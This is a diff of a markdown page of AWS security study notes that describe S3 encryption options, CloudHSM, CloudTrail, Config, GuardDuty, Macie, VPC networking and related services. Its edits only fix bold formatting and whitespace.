 Amazon S3 is a service that allows you **store important amounts of data**.
 
-Amazon S3 provides multiple options to achieve the **protection **of data at REST. The options include **Permission** (Policy), **Encryption** (Client and Server Side), **Bucket Versioning** and **MFA** **based delete**. The **user can enable** any of these options to achieve data protection. **Data replication** is an internal facility by AWS where **S3 automatically replicates each object across all the Availability Zones** and the organization need not enable it in this case.
+Amazon S3 provides multiple options to achieve the **protection** of data at REST. The options include **Permission** (Policy), **Encryption** (Client and Server Side), **Bucket Versioning** and **MFA** **based delete**. The **user can enable** any of these options to achieve data protection. **Data replication** is an internal facility by AWS where **S3 automatically replicates each object across all the Availability Zones** and the organization need not enable it in this case.
 
 With resource-based permissions, you can define permissions for sub-directories of your bucket separately.
 
@@ -241,7 +241,7 @@ It's possible to **enable S3 access login** (which by default is disabled) to so
 
 **Server-side encryption with S3 managed keys, SSE-S3:** This option requires minimal configuration and all management of encryption keys used are managed by AWS. All you need to do is to **upload your data and S3 will handle all other aspects**. Each bucket in a S3 account is assigned a bucket key.
 
-* Encryption: 
+* Encryption:&#x20;
   * Object Data + created plaintext DEK --> Encrypted data (stored inside S3)
   * Created plaintext DEK + S3 Master Key --> Encrypted DEK (stored inside S3) and plain text is deleted from memory
 * Decryption:
@@ -250,7 +250,7 @@ It's possible to **enable S3 access login** (which by default is disabled) to so
 
 Please, note that in this case **the key is managed by AWS** (rotation only every 3 years). If you use your own key you willbe able to rotate, disable and apply access control.
 
-**Server-side encryption with KMS managed keys, SSE-KMS:** This method allows S3 to use the key management service to generate your data encryption keys. KMS gives you a far greater flexibility of how your keys are managed. For example, you are able to disable, rotate, and apply access controls to the CMK, and order to against their usage using AWS Cloud Trail. 
+**Server-side encryption with KMS managed keys, SSE-KMS:** This method allows S3 to use the key management service to generate your data encryption keys. KMS gives you a far greater flexibility of how your keys are managed. For example, you are able to disable, rotate, and apply access controls to the CMK, and order to against their usage using AWS Cloud Trail.&#x20;
 
 * Encryption:
   * S3 request data keys from KMS CMK
@@ -261,7 +261,7 @@ Please, note that in this case **the key is managed by AWS** (rotation only ever
   * KMS decrypt the data key with the CMK and send it back to S3
   * S3 decrypts the object data
 
-**Server-side encryption with customer provided keys, SSE-C:** This option gives you the opportunity to provide your own master key that you may already be using outside of AWS. Your customer-provided key would then be sent with your data to S3, where S3 would then perform the encryption for you. 
+**Server-side encryption with customer provided keys, SSE-C:** This option gives you the opportunity to provide your own master key that you may already be using outside of AWS. Your customer-provided key would then be sent with your data to S3, where S3 would then perform the encryption for you.&#x20;
 
 * Encryption:
   * The user sends the object data + Customer key to S3
@@ -273,7 +273,7 @@ Please, note that in this case **the key is managed by AWS** (rotation only ever
   * The key is validated against the HMAC value stored
   * The customer provided key is then used to decrypt the data
 
-**Client-side encryption with KMS, CSE-KMS:** Similarly to SSE-KMS, this also uses the key management service to generate your data encryption keys. However, this time KMS is called upon via the client not S3. The encryption then takes place client-side and the encrypted data is then sent to S3 to be stored. 
+**Client-side encryption with KMS, CSE-KMS:** Similarly to SSE-KMS, this also uses the key management service to generate your data encryption keys. However, this time KMS is called upon via the client not S3. The encryption then takes place client-side and the encrypted data is then sent to S3 to be stored.&#x20;
 
 * Encryption:
   * Client request for a data key to KMS
@@ -285,9 +285,9 @@ Please, note that in this case **the key is managed by AWS** (rotation only ever
   * The client asks KMS to decrypt the encrypted key using the CMK and KMS sends back the plaintext DEK
   * The client can now decrypt the encrypted data
 
-**Client-side encryption with customer provided keys, CSE-C:** Using this mechanism, you are able to utilize your own provided keys and use an AWS-SDK client to encrypt your data before sending it to S3 for storage. 
+**Client-side encryption with customer provided keys, CSE-C:** Using this mechanism, you are able to utilize your own provided keys and use an AWS-SDK client to encrypt your data before sending it to S3 for storage.&#x20;
 
-* Encryption: 
+* Encryption:&#x20;
   * The client generates a DEK and encrypts the plaintext data
   * Then, using it's own custom CMK it encrypts the DEK
   * submit the encrypted data + encrypted DEK to S3 where it's stored
@@ -303,16 +303,16 @@ The unusual feature of CloudHSM is that it is a physical device, and thus it is
 
 Typically, a device is available within 15 minutes assuming there is capacity, but if the AZ is out of capacity it can take two weeks or more to acquire additional capacity.
 
-Both KMS and CloudHSM are available to you at AWS and both are integrated with your apps at AWS. Since this is a physical device dedicated to you,** the keys are stored on the device**. Keys need to either be** replicated to another device**, backed up to offline storage, or exported to a standby appliance. **This device is not backed** by S3 or any other service at AWS like KMS. 
+Both KMS and CloudHSM are available to you at AWS and both are integrated with your apps at AWS. Since this is a physical device dedicated to you, **the keys are stored on the device**. Keys need to either be **replicated to another device**, backed up to offline storage, or exported to a standby appliance. **This device is not backed** by S3 or any other service at AWS like KMS.&#x20;
 
 In **CloudHSM**, you have to **scale the service yourself**. You have to provision enough CloudHSM devices to handle whatever your encryption needs are based on the encryption algorithms you have chosen to implement for your solution.\
-Key Management Service scaling is performed by AWS and automatically scales on demand, so as your use grows, so might the number of CloudHSM appliances that are required. Keep this in mind as you scale your solution and if your solution has auto-scaling, make sure your maximum scale is accounted for with enough CloudHSM appliances to service the solution. 
+Key Management Service scaling is performed by AWS and automatically scales on demand, so as your use grows, so might the number of CloudHSM appliances that are required. Keep this in mind as you scale your solution and if your solution has auto-scaling, make sure your maximum scale is accounted for with enough CloudHSM appliances to service the solution.&#x20;
 
-Just like scaling,** performance is up to you with CloudHSM**. Performance varies based on which encryption algorithm is used and on how often you need to access or retrieve the keys to encrypt the data. Key management service performance is handled by Amazon and automatically scales as demand requires it. CloudHSM's performance is achieved by adding more appliances and if you need more performance you either add devices or alter the encryption method to the algorithm that is faster.
+Just like scaling, **performance is up to you with CloudHSM**. Performance varies based on which encryption algorithm is used and on how often you need to access or retrieve the keys to encrypt the data. Key management service performance is handled by Amazon and automatically scales as demand requires it. CloudHSM's performance is achieved by adding more appliances and if you need more performance you either add devices or alter the encryption method to the algorithm that is faster.
 
-If your solution is **multi-region**, you should add several **CloudHSM appliances in the second region and work out the cross-region connectivity with a private VPN connection** or some method to ensure the traffic is always protected between the appliance at every layer of the connection. If you have a multi-region solution you need to think about how to** replicate keys and set up additional CloudHSM devices in the regions where you operate**. You can very quickly get into a scenario where you have six or eight devices spread across multiple regions, enabling full redundancy of your encryption keys.
+If your solution is **multi-region**, you should add several **CloudHSM appliances in the second region and work out the cross-region connectivity with a private VPN connection** or some method to ensure the traffic is always protected between the appliance at every layer of the connection. If you have a multi-region solution you need to think about how to **replicate keys and set up additional CloudHSM devices in the regions where you operate**. You can very quickly get into a scenario where you have six or eight devices spread across multiple regions, enabling full redundancy of your encryption keys.
 
-**CloudHSM **is an enterprise class service for secured key storage and can be used as a **root of trust for an enterprise**. It can store private keys in PKI and certificate authority keys in X509 implementations. In addition to symmetric keys used in symmetric algorithms such as AES, **KMS stores and physically protects symmetric keys only (cannot act as a certificate authority)**, so if you need to store PKI and CA keys a CloudHSM or two or three could be your solution. 
+**CloudHSM** is an enterprise class service for secured key storage and can be used as a **root of trust for an enterprise**. It can store private keys in PKI and certificate authority keys in X509 implementations. In addition to symmetric keys used in symmetric algorithms such as AES, **KMS stores and physically protects symmetric keys only (cannot act as a certificate authority)**, so if you need to store PKI and CA keys a CloudHSM or two or three could be your solution.&#x20;
 
 **CloudHSM is considerably more expensive than Key Management Service**. CloudHSM is a hardware appliance so you have fix costs to provision the CloudHSM device, then an hourly cost to run the appliance. The cost is multiplied by as many CloudHSM appliances that are required to achieve your specific requirements.\
 Additionally, cross consideration must be made in the purchase of third party software such as SafeNet ProtectV software suites and integration time and effort. Key Management Service is a usage based and depends on the number of keys you have and the input and output operations. As key management provides seamless integration with many AWS services, integration costs should be significantly lower. Costs should be considered secondary factor in encryption solutions. Encryption is typically used for security and compliance.
@@ -321,35 +321,35 @@ Additionally, cross consideration must be made in the purchase of third party so
 
 ### CloudHSM Suggestions
 
-1. Always deploy CloudHSM in an **HA setup **with at least two appliances in **separate availability zones**, and if possible, deploy a third either on premise or in another region at AWS.
-2. Be careful when **initializing **a **CloudHSM**. This action **will destroy the keys**, so either have another copy of the keys or be absolutely sure you do not and never, ever will need these keys to decrypt any data.
+1. Always deploy CloudHSM in an **HA setup** with at least two appliances in **separate availability zones**, and if possible, deploy a third either on premise or in another region at AWS.
+2. Be careful when **initializing** a **CloudHSM**. This action **will destroy the keys**, so either have another copy of the keys or be absolutely sure you do not and never, ever will need these keys to decrypt any data.
 3. CloudHSM only **supports certain versions of firmware** and software. Before performing any update, make sure the firmware and or software is supported by AWS. You can always contact AWS support to verify if the upgrade guide is unclear.
 4. The **network configuration should never be changed.** Remember, it's in a AWS data center and AWS is monitoring base hardware for you. This means that if the hardware fails, they will replace it for you, but only if they know it failed.
-5. The **SysLog forward should not be removed or changed**. You can always **add **a SysLog forwarder to direct the logs to your own collection tool.
-6. The **SNMP **configuration has the same basic restrictions as the network and SysLog folder. This **should not be changed or removed**. An **additional **SNMP configuration is fine, just make sure you do not change the one that is already on the appliance.
+5. The **SysLog forward should not be removed or changed**. You can always **add** a SysLog forwarder to direct the logs to your own collection tool.
+6. The **SNMP** configuration has the same basic restrictions as the network and SysLog folder. This **should not be changed or removed**. An **additional** SNMP configuration is fine, just make sure you do not change the one that is already on the appliance.
 7. Another interesting best practice from AWS is **not to change the NTP configuration**. It is not clear what would happen if you did, so keep in mind that if you don't use the same NTP configuration for the rest of your solution then you could have two time sources. Just be aware of this and know that the CloudHSM has to stay with the existing NTP source.
 
 The initial launch charge for CloudHSM is $5,000 to allocate the hardware appliance dedicated for your use, then there is an hourly charge associated with running CloudHSM that is currently at $1.88 per hour of operation, or approximately $1,373 per month.
 
 The most common reason to use CloudHSM is compliance standards that you must meet for regulatory reasons. **KMS does not offer data support for asymmetric keys. CloudHSM does let you store asymmetric keys securely**.
 
-The** public key is installed on the HSM appliance during provisioning** so you can access the CloudHSM instance via SSH.
+The **public key is installed on the HSM appliance during provisioning** so you can access the CloudHSM instance via SSH.
 
 ## Amazon Athena
 
-Amazon Athena is an interactive query service that makes it easy to **analyze data **directly in Amazon Simple Storage Service (Amazon **S3**) **using **standard **SQL**.
+Amazon Athena is an interactive query service that makes it easy to **analyze data** directly in Amazon Simple Storage Service (Amazon **S3**) **using** standard **SQL**.
 
-You need to** prepare a relational DB table** with the format of the content that is going to appear in the monitored S3 buckets. And then, Amazon Athena will be able to populate the DB from th logs, so you can query it.
+You need to **prepare a relational DB table** with the format of the content that is going to appear in the monitored S3 buckets. And then, Amazon Athena will be able to populate the DB from th logs, so you can query it.
 
 Amazon Athena supports the **hability to query S3 data that is already encrypted** and if configured to do so, **Athena can also encrypt the results of the query which can then be stored in S3**.
 
-**This encryption of results is independent of the underlying queried S3 data**, meaning that even if the S3 data is not encrypted, the queried results can be encrypted. A couple of points to be aware of is that Amazon Athena only supports data that has been **encrypted **with the **following S3 encryption methods**, **SSE-S3, SSE-KMS, and CSE-KMS**.
+**This encryption of results is independent of the underlying queried S3 data**, meaning that even if the S3 data is not encrypted, the queried results can be encrypted. A couple of points to be aware of is that Amazon Athena only supports data that has been **encrypted** with the **following S3 encryption methods**, **SSE-S3, SSE-KMS, and CSE-KMS**.
 
 SSE-C and CSE-E are not supported. In addition to this, it's important to understand that Amazon Athena will only run queries against **encrypted objects that are in the same region as the query itself**. If you need to query S3 data that's been encrypted using KMS, then specific permissions are required by the Athena user to enable them to perform the query.
 
 ## AWS CloudTrail
 
-This service** tracks and monitors AWS API calls made within the environment**. Each call to an API (event) is logged. Each logged event contains:
+This service **tracks and monitors AWS API calls made within the environment**. Each call to an API (event) is logged. Each logged event contains:
 
 * The name of the called API: `eventName`
 * The called service: `eventSource`
@@ -362,7 +362,7 @@ This service** tracks and monitors AWS API calls made within the environment**.
 * The request parameters: `requestParameters`
 * The response elements: `responseElements`
 
-Event's are written to a new log file** approximately each 5 minutes in a JSON file**, they are held by CloudTrail and finally, log files are **delivered to S3 approximately 15mins after**.\
+Event's are written to a new log file **approximately each 5 minutes in a JSON file**, they are held by CloudTrail and finally, log files are **delivered to S3 approximately 15mins after**.\
 CloudTrail allows to use **log file integrity in order to be able to verify that your log files have remained unchanged** since CloudTrail delivered them to you. It creates a SHA-256 hash of the logs inside a digest file. A sha-256 hash of the new logs is created every hour.\
 When creating a Trail the event selectors will allow you to indicate the trail to log: Management, data or insights events.
 
@@ -378,7 +378,7 @@ Logs are saved in an S3 bucket. By default Server Side Encryption is used (SSE-S
 
 Note that the folders "_AWSLogs_" and "_CloudTrail_" are fixed folder names,
 
-**Digest **files have a similar folders path:
+**Digest** files have a similar folders path:
 
 ![](<../.gitbook/assets/image (437).png>)
 
@@ -401,7 +401,7 @@ aws cloudtrail validate-logs --trail-arn <trailARN> --start-time <start-time> [-
 ### Logs to CloudWatch
 
 **CloudTrail can automatically send logs to CloudWatch so you can set alerts that warns you when suspicious activities are performed.**\
-Note that in order to allow CloudTrail to send the logs to CloudWatch a **role **needs to be created that allows that action. If possible, it's recommended to use AWS default role to perform these actions. This role will allow CloudTrail to:
+Note that in order to allow CloudTrail to send the logs to CloudWatch a **role** needs to be created that allows that action. If possible, it's recommended to use AWS default role to perform these actions. This role will allow CloudTrail to:
 
 * CreateLogStream: This allows to create a CloudWatch Logs log streams
 * PutLogEvents: Deliver CloudTrail logs to CloudWatch Logs log stream
@@ -414,11 +414,11 @@ CloudTrail Event History allows you to inspect in a table the logs that have bee
 
 ### Insights
 
-**CloudTrail Insights** automatically **analyzes **write management events from CloudTrail trails and **alerts **you to **unusual activity**. For example, if there is an increase in `TerminateInstance` events that differs from established baselines, you’ll see it as an Insight event. These events make **finding and responding to unusual API activity easier **than ever.
+**CloudTrail Insights** automatically **analyzes** write management events from CloudTrail trails and **alerts** you to **unusual activity**. For example, if there is an increase in `TerminateInstance` events that differs from established baselines, you’ll see it as an Insight event. These events make **finding and responding to unusual API activity easier** than ever.
 
 ## CloudWatch
 
-Amazon CloudWatch allows to** collect all of your logs in a single repository** where you can create **metrics **and **alarms **based on the logs.\
+Amazon CloudWatch allows to **collect all of your logs in a single repository** where you can create **metrics** and **alarms** based on the logs.\
 CloudWatch Log Event have a **size limitation of 256KB of each log line**.
 
 You can monitor for example logs from CloudTrail.\
@@ -435,9 +435,9 @@ Events that are monitored:
 
 You can install agents insie your machines/containers to automatically send the logs back to CloudWatch.
 
-* **Create **a **role **and **attach **it to the **instance **with permissions allowing CloudWatch to collect data from the instances in addition to interacting with AWS systems manager SSM (CloudWatchAgentAdminPolicy & AmazonEC2RoleforSSM)
-* **Download **and **install **the **agent **onto the EC2 instance ([https://s3.amazonaws.com/amazoncloudwatch-agent/linux/amd64/latest/AmazonCloudWatchAgent.zip](https://s3.amazonaws.com/amazoncloudwatch-agent/linux/amd64/latest/AmazonCloudWatchAgent.zip)). You can download it from inside the EC2 or install it automatically using AWS System Manager selecting the package AWS-ConfigureAWSPackage
-* **Configure **and **start **the CloudWatch Agent
+* **Create** a **role** and **attach** it to the **instance** with permissions allowing CloudWatch to collect data from the instances in addition to interacting with AWS systems manager SSM (CloudWatchAgentAdminPolicy & AmazonEC2RoleforSSM)
+* **Download** and **install** the **agent** onto the EC2 instance ([https://s3.amazonaws.com/amazoncloudwatch-agent/linux/amd64/latest/AmazonCloudWatchAgent.zip](https://s3.amazonaws.com/amazoncloudwatch-agent/linux/amd64/latest/AmazonCloudWatchAgent.zip)). You can download it from inside the EC2 or install it automatically using AWS System Manager selecting the package AWS-ConfigureAWSPackage
+* **Configure** and **start** the CloudWatch Agent
 
 A log group has many streams. A stream has many events. And inside of each stream, the events are guaranteed to be in order.
 
@@ -456,10 +456,10 @@ Also, they can be used for non cost related monitoring like the usage of a servi
 AWS Config **capture resource changes**, so any change to a resource supported by Config can be recorded, which will **record what changed along with other useful metadata, all held within a file known as a configuration item**, a CI.\
 This service is **region specific**.
 
-A configuration item or **CI **as it's known, is a key component of AWS Config. It is comprised of a JSON file that **holds the configuration information, relationship information and other metadata as a point-in-time snapshot view of a supported resource**. All the information that AWS Config can record for a resource is captured within the CI. A CI is created **every time** a supported resource has a change made to its configuration in any way. In addition to recording the details of the affected resource, AWS Config will also record CIs for any directly related resources to ensure the change did not affect those resources too.
+A configuration item or **CI** as it's known, is a key component of AWS Config. It is comprised of a JSON file that **holds the configuration information, relationship information and other metadata as a point-in-time snapshot view of a supported resource**. All the information that AWS Config can record for a resource is captured within the CI. A CI is created **every time** a supported resource has a change made to its configuration in any way. In addition to recording the details of the affected resource, AWS Config will also record CIs for any directly related resources to ensure the change did not affect those resources too.
 
 * **Metadata**: Contains details about the configuration item itself. A version ID and a configuration ID, which uniquely identifies the CI. Ither information can include a MD5Hash that allows you to compare other CIs already recorded against the same resource.
-* **Attributes**: This holds common** attribute information against the actual resource**. Within this section, we also have a unique resource ID, and any key value tags that are associated to the resource. The resource type is also listed. For example, if this was a CI for an EC2 instance, the resource types listed could be the network interface, or the elastic IP address for that EC2 instance
+* **Attributes**: This holds common **attribute information against the actual resource**. Within this section, we also have a unique resource ID, and any key value tags that are associated to the resource. The resource type is also listed. For example, if this was a CI for an EC2 instance, the resource types listed could be the network interface, or the elastic IP address for that EC2 instance
 * **Relationships**: This holds information for any connected **relationship that the resource may have**. So within this section, it would show a clear description of any relationship to other resources that this resource had. For example, if the CI was for an EC2 instance, the relationship section may show the connection to a VPC along with the subnet that the EC2 instance resides in.
 * **Current configuration:** This will display the same information that would be generated if you were to perform a describe or list API call made by the AWS CLI. AWS Config uses the same API calls to get the same information.
 * **Related events**: This relates to AWS CloudTrail. This will display the **AWS CloudTrail event ID that is related to the change that triggered the creation of this CI**. There is a new CI made for every change made against a resource. As a result, different CloudTrail event IDs will be created.
@@ -475,7 +475,7 @@ A configuration item or **CI **as it's known, is a key component of AWS Config.
 ### Config Rules
 
 Config rules are a great way to help you **enforce specific compliance checks** **and controls across your resources**, and allows you to adopt an ideal deployment specification for each of your resource types. Each rule **is essentially a lambda function** that when called upon evaluates the resource and carries out some simple logic to determine the compliance result with the rule. **Each time a change is made** to one of your supported resources, **AWS Config will check the compliance against any config rules that you have in place**.\
-AWS have a number of **predefined rules **that fall under the security umbrella that are ready to use. For example, Rds-storage-encrypted. This checks whether storage encryption is activated by your RDS database instances. Encrypted-volumes. This checks to see if any EBS volumes that have an attached state are encrypted.
+AWS have a number of **predefined rules** that fall under the security umbrella that are ready to use. For example, Rds-storage-encrypted. This checks whether storage encryption is activated by your RDS database instances. Encrypted-volumes. This checks to see if any EBS volumes that have an attached state are encrypted.
 
 * **AWS Managed rules**: Set of predefined rules that cover a lot of best practices, so it's always worth browsing these rules first before setting up your own as there is a chance that the rule may already exist.
 * **Custom rules**: You can create your own rules to check specific customconfigurations.
@@ -512,7 +512,7 @@ You can make any of those run on the EC2 machines you decide.
 * Rules packages to be used
 * Duration of the assessment run 15min/1hour/8hours
 * SNS topics, select when notify: Starts, finished, change state, reports a finding
-* Attributes to b assigned to findings 
+* Attributes to b assigned to findings&#x20;
 
 **Rule package**: Contains a number of individual rules that are check against an EC2 when an assessment is run. Each one also have a severity (high, medium, low, informational). The possibilities are:
 
@@ -525,34 +525,34 @@ Once you have configured the Amazon Inspector Role, the AWS Agents are Installed
 Amazon Inspector has a pre-defined set of rules, grouped into packages. Each Assessment Template defines which rules packages to be included in the test. Instances are being evaluated against rules packages included in the assessment template.
 
 {% hint style="info" %}
-Note that nowadays AWS already allow you to **autocreate **all the necesary **configurations **and even automatically **install the agents inside the EC2 instances.**
+Note that nowadays AWS already allow you to **autocreate** all the necesary **configurations** and even automatically **install the agents inside the EC2 instances.**
 {% endhint %}
 
 ### **Reporting**
 
 **Telemetry**: data that is collected from an instance, detailing its configuration, behavior and processes during an assessment run. Once collected, the data is then sent back to Amazon Inspector in near-real-time over TLS where it is then stored and encrypted on S3 via an ephemeral KMS key. Amazon Inspector then accesses the S3 Bucket, decrypts the data in memory, and analyzes it against any rules packages used for that assessment to generate the findings.
 
-**Assessment Report**: Provide details on what was assessed and the results of the assessment. 
+**Assessment Report**: Provide details on what was assessed and the results of the assessment.&#x20;
 
 * The **findings report** contain the summary of the assessment, info about the EC2 and rules and the findings that occurred.
-* The **full report **is the finding report + a list of rules that were passed.
+* The **full report** is the finding report + a list of rules that were passed.
 
 ## Trusted Advisor
 
-The main function of Trusted Advisor is to** recommend improvements across your AWS account** to help optimize and hone your environment based on **AWS best practices**. These recommendations cover four distinct categories. It's a is a cross-region service.
+The main function of Trusted Advisor is to **recommend improvements across your AWS account** to help optimize and hone your environment based on **AWS best practices**. These recommendations cover four distinct categories. It's a is a cross-region service.
 
 1. **Cost optimization:** which helps to identify ways in which you could **optimize your resources** to save money.
 2. **Performance:** This scans your resources to highlight any **potential performance issues** across multiple services.
 3. **Security:** This category analyzes your environment for any **potential security weaknesses** or vulnerabilities.
-4. **Fault tolerance:** Which suggests best practices to** maintain service operations** by increasing resiliency should a fault or incident occur across your resources.
+4. **Fault tolerance:** Which suggests best practices to **maintain service operations** by increasing resiliency should a fault or incident occur across your resources.
 
-The full power and potential of AWS Trusted Advisor is only really **available if you have a business or enterprise support plan with AWS**. **Without **either of these plans, then you will only have access to** six core checks** that are freely available to everyone. These free core checks are split between the performance and security categories, with the majority of them being related to security. These are the 6 checks: service limits, Security Groups Specific Ports Unrestricted, Amazon EBS Public Snapshots, Amazon RDS Public Snapshots, IAM Use, and MFA on root account.\
+The full power and potential of AWS Trusted Advisor is only really **available if you have a business or enterprise support plan with AWS**. **Without** either of these plans, then you will only have access to **six core checks** that are freely available to everyone. These free core checks are split between the performance and security categories, with the majority of them being related to security. These are the 6 checks: service limits, Security Groups Specific Ports Unrestricted, Amazon EBS Public Snapshots, Amazon RDS Public Snapshots, IAM Use, and MFA on root account.\
 Trusted advisor can send notifications and you can exclude items from it.\
-Trusted advisor data is** automatically refreshed every 24 hours**, **but **you can perform a **manual one 5 mins after the previous one.**
+Trusted advisor data is **automatically refreshed every 24 hours**, **but** you can perform a **manual one 5 mins after the previous one.**
 
 ## Amazon GuardDuty
 
-Amazon GuardDuty is a regional-based intelligent **threat detection service**, the first of its kind offered by AWS, which allows users to **monitor **their **AWS account **for **unusual and unexpected behavior by analyzing VPC Flow Logs, AWS CloudTrail management event logs, Cloudtrail S3 data event logs, and DNS logs**. It uses **threat intelligence feeds**, such as lists of malicious IP addresses and domains, and **machine learning** to identify **unexpected and potentially unauthorized and malicious activity** within your AWS environment. This can include issues like escalations of privileges, uses of exposed credentials, or communication with malicious IP addresses, or domains.\
+Amazon GuardDuty is a regional-based intelligent **threat detection service**, the first of its kind offered by AWS, which allows users to **monitor** their **AWS account** for **unusual and unexpected behavior by analyzing VPC Flow Logs, AWS CloudTrail management event logs, Cloudtrail S3 data event logs, and DNS logs**. It uses **threat intelligence feeds**, such as lists of malicious IP addresses and domains, and **machine learning** to identify **unexpected and potentially unauthorized and malicious activity** within your AWS environment. This can include issues like escalations of privileges, uses of exposed credentials, or communication with malicious IP addresses, or domains.\
 For example, GuardDuty can detect compromised EC2 instances serving malware or mining bitcoin. It also monitors AWS account access behavior for signs of compromise, such as unauthorized infrastructure deployments, like instances deployed in a Region that has never been used, or unusual API calls, like a password policy change to reduce password strength.\
 You can **upload list of whitelisted and blacklisted IP addresses** so GuardDuty takes that info into account.
 
@@ -584,12 +584,12 @@ If you just stop it, the existing findings will remain.
 
 ## Amazon Macie
 
-The main function of the service is to provide an automatic method of **detecting, identifying, and also classifying data **that you are storing within your AWS account.
+The main function of the service is to provide an automatic method of **detecting, identifying, and also classifying data** that you are storing within your AWS account.
 
 The service is backed by **machine learning**, allowing your data to be actively reviewed as different actions are taken within your AWS account. Machine learning can spot access patterns and **user behavior** by analyzing **cloud trail event** data to **alert against any unusual or irregular activity**. Any findings made by Amazon Macie are presented within a dashboard which can trigger alerts, allowing you to quickly resolve any potential threat of exposure or compromise of your data.
 
 Amazon Macie will automatically and continuously **monitor and detect new data that is stored in Amazon S3**. Using the abilities of machine learning and artificial intelligence, this service has the ability to familiarize over time, access patterns to data. \
-Amazon Macie also uses natural language processing methods to **classify and interpret different data types and content**. NLP uses principles from computer science and computational linguistics to look at the interactions between computers and the human language. In particular, how to program computers to understand and decipher language data. The **service can automatically assign business values to data that is assessed in the form of a risk score**. This enables Amazon Macie to order findings on a priority basis, enabling you to focus on the most critical alerts first. In addition to this, Amazon Macie also has the added benefit of being able to **monitor and discover security changes governing your data**. As well as identify specific security-centric data such as access keys held within an S3 bucket. 
+Amazon Macie also uses natural language processing methods to **classify and interpret different data types and content**. NLP uses principles from computer science and computational linguistics to look at the interactions between computers and the human language. In particular, how to program computers to understand and decipher language data. The **service can automatically assign business values to data that is assessed in the form of a risk score**. This enables Amazon Macie to order findings on a priority basis, enabling you to focus on the most critical alerts first. In addition to this, Amazon Macie also has the added benefit of being able to **monitor and discover security changes governing your data**. As well as identify specific security-centric data such as access keys held within an S3 bucket.&#x20;
 
 This protective and proactive security monitoring enables Amazon Macie to identify critical, sensitive, and security focused data such as API keys, secret keys, in addition to PII (personally identifiable information) and PHI data.
 
@@ -615,7 +615,7 @@ Pre-defined alerts categories:
 * Service disruption
 * Suspicious access
 
-The **alert summary** provides detailed information to allow you to respond appropriately. It has a description that provides a deeper level of understanding of why it was generated. It also has a breakdown of the results.  
+The **alert summary** provides detailed information to allow you to respond appropriately. It has a description that provides a deeper level of understanding of why it was generated. It also has a breakdown of the results. &#x20;
 
 The user has the possibility to create new custom alerts.
 
@@ -693,7 +693,7 @@ Limitations:
 * Traffic relating to an Amazon Windows activation license from a Windows instance
 * Traffic between a network load balancer interface and an endpoint network interface
 
-For every network interface that publishes data to the CloudWatch log group, it will use a different log stream. And within each of these streams, there will be the flow log event data that shows the content of the log entries. Each of these** logs captures data during a window of approximately 10 to 15 minutes**.
+For every network interface that publishes data to the CloudWatch log group, it will use a different log stream. And within each of these streams, there will be the flow log event data that shows the content of the log entries. Each of these **logs captures data during a window of approximately 10 to 15 minutes**.
 
 ![](<../.gitbook/assets/image (432).png>)
 
@@ -707,11 +707,11 @@ A subnet cannot be in different availability zones at the same time.
 
 By having **multiple Subnets with similar resources grouped together**, it allows for greater security management. By implementing **network level virtual firewalls,** called network access control lists, or **NACLs**, it's possible to **filter traffic** on specific ports from both an ingress and egress point at the Subnet level.
 
-When you create a subnet the **network **and **broadcast address **of the subnet **can't be used** for host addresses and **AWS reserves the first three host IP addresses** of each subnet **for** **internal AWS usage**: he first host address used is for the VPC router. The second address is reserved for AWS DNS and the third address is reserved for future use.
+When you create a subnet the **network** and **broadcast address** of the subnet **can't be used** for host addresses and **AWS reserves the first three host IP addresses** of each subnet **for** **internal AWS usage**: he first host address used is for the VPC router. The second address is reserved for AWS DNS and the third address is reserved for future use.
 
 It's called **public subnets** to those that have **direct access to the Internet, whereas private subnets do not.**
 
-In order to make a subnet public you need to **create **and **attach **an **Internet gateway** to your VPC. This Internet gateway is a managed service, controlled, configured, and maintained by AWS. It scales horizontally automatically, and is classified as a highly valuable component of your VPC infrastructure. Once your Internet gateway is attached to your VPC, you have a gateway to the Internet. However, at this point, your instances have no idea how to get out to the Internet. As a result, you need to add a default route to the route table associated with your subnet. The route could have a **destination value of 0.0. 0. 0/0, and the target value will be set as your Internet gateway ID**.
+In order to make a subnet public you need to **create** and **attach** an **Internet gateway** to your VPC. This Internet gateway is a managed service, controlled, configured, and maintained by AWS. It scales horizontally automatically, and is classified as a highly valuable component of your VPC infrastructure. Once your Internet gateway is attached to your VPC, you have a gateway to the Internet. However, at this point, your instances have no idea how to get out to the Internet. As a result, you need to add a default route to the route table associated with your subnet. The route could have a **destination value of 0.0. 0. 0/0, and the target value will be set as your Internet gateway ID**.
 
 By default, all subnets have the automatic assigned of public IP addresses turned off but it can be turned on.
 
@@ -721,10 +721,10 @@ If you are **connection a subnet with a different subnet you cannot access the s
 
 ### VPC Peering
 
-VPC peering allows you to** connect two or more VPCs together**, using IPV4 or IPV6, as if they were a part of the same network.
+VPC peering allows you to **connect two or more VPCs together**, using IPV4 or IPV6, as if they were a part of the same network.
 
-Once the peer connectivity is established, **resources in one VPC can access resources in the other**. The connectivity between the VPCs is implemented through the existing AWS network infrastructure, and so it is highly available with no bandwidth bottleneck. As** peered connections operate as if they were part of the same network**, there are restrictions when it comes to your CIDR block ranges that can be used.\
-If you have** overlapping or duplicate CIDR** ranges for your VPC, then **you'll not be able to peer the VPCs** together.\
+Once the peer connectivity is established, **resources in one VPC can access resources in the other**. The connectivity between the VPCs is implemented through the existing AWS network infrastructure, and so it is highly available with no bandwidth bottleneck. As **peered connections operate as if they were part of the same network**, there are restrictions when it comes to your CIDR block ranges that can be used.\
+If you have **overlapping or duplicate CIDR** ranges for your VPC, then **you'll not be able to peer the VPCs** together.\
 Each AWS VPC will **only communicate with its peer**. As an example, if you have a peering connection between VPC 1 and VPC 2, and another connection between VPC 2 and VPC 3 as shown, then VPC 1 and 2 could communicate with each other directly, as can VPC 2 and VPC 3, however, VPC 1 and VPC 3 could not. **You can't route through one VPC to get to another.**
 
 ## AWS Secrets Manager
@@ -741,35 +741,35 @@ To allow a user form a different account to access your secret you need to autho
 
 ## EMR
 
-EMR is a managed service by AWS and is comprised of a** cluster of EC2 instances that's highly scalable** to process and run big data frameworks such Apache Hadoop and Spark.
+EMR is a managed service by AWS and is comprised of a **cluster of EC2 instances that's highly scalable** to process and run big data frameworks such Apache Hadoop and Spark.
 
-From EMR version 4.8.0 and onwards, we have the ability to create a** security configuration** specifying different settings on **how to manage encryption for your data within your clusters**. You can either encrypt your data at rest, data in transit, or if required, both together. The great thing about these security configurations is they're not actually a part of your EC2 clusters.
+From EMR version 4.8.0 and onwards, we have the ability to create a **security configuration** specifying different settings on **how to manage encryption for your data within your clusters**. You can either encrypt your data at rest, data in transit, or if required, both together. The great thing about these security configurations is they're not actually a part of your EC2 clusters.
 
